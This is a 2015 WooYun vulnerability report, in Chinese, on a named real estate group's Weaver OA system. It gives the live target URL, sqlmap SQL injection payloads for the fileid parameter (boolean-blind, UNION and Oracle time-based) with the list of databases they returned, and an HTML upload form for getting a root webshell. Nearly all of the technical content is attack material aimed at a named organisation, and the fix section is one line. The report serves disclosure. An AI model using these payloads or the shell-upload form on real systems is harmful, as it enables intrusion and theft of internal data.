国企绿地集团泛微OA系统sql注入+内部信息泄漏+getshell（root） | wooyun-2015-0130481

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0130481

漏洞标题：

国企绿地集团泛微OA系统sql注入+内部信息泄漏+getshell（root）

漏洞详情

披露状态：

2015-07-30：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-09-13：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

绿地集团是中国第一家也是目前（截止2013年）唯一一家跻身《财富》世界500强的以房地产为主业的企业集团。2014年位居《财富》世界500强第268位。

详细说明：

http://home.ldjt.com.cn/weaver/weaver.email.FileDownloadLocation?fileid=32&download=1

看见是泛微的oa，直接在wooyun上搜了下，发现挺多利用漏洞，就不一一贴出来参考了哪些。
1.注入参数：fileid

Place: GET
Parameter: fileid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fileid=32 AND 1250=1250&download=1
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: fileid=-6867 UNION ALL SELECT CHR(58)||CHR(120)||CHR(97)||CHR(113)|
|CHR(58)||CHR(103)||CHR(70)||CHR(100)||CHR(87)||CHR(111)||CHR(82)||CHR(115)||CHR
(97)||CHR(103)||CHR(89)||CHR(58)||CHR(116)||CHR(113)||CHR(103)||CHR(58), NULL, N
ULL, NULL, NULL, NULL, NULL FROM DUAL-- &download=1
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: fileid=32 AND 1259=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(100)||CHR
(83)||CHR(67),5)&download=1

available databases [19]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] DUROAX
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB

漏洞证明：

通过遍历fileid参数，发现很多内部文件，下面举一两例子证明下

3.利用表单提交

<form method='post' action='http://www.xxoo.com/tools/SWFUpload/upload.jsp'  enctype="multipart/form-data" > 
<input type="file" id="file" name="test" style="height:20px;BORDER: #8F908B 1px solid;"/>
<button type=submit value="getshell">getshell</button> </form>

直接getshell

内部东西应该很多，就不深入了。

修复方案：

升级打补丁。

版权声明：转载请注明来源 ShAdow丶@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要 关注数(24) 关注此漏洞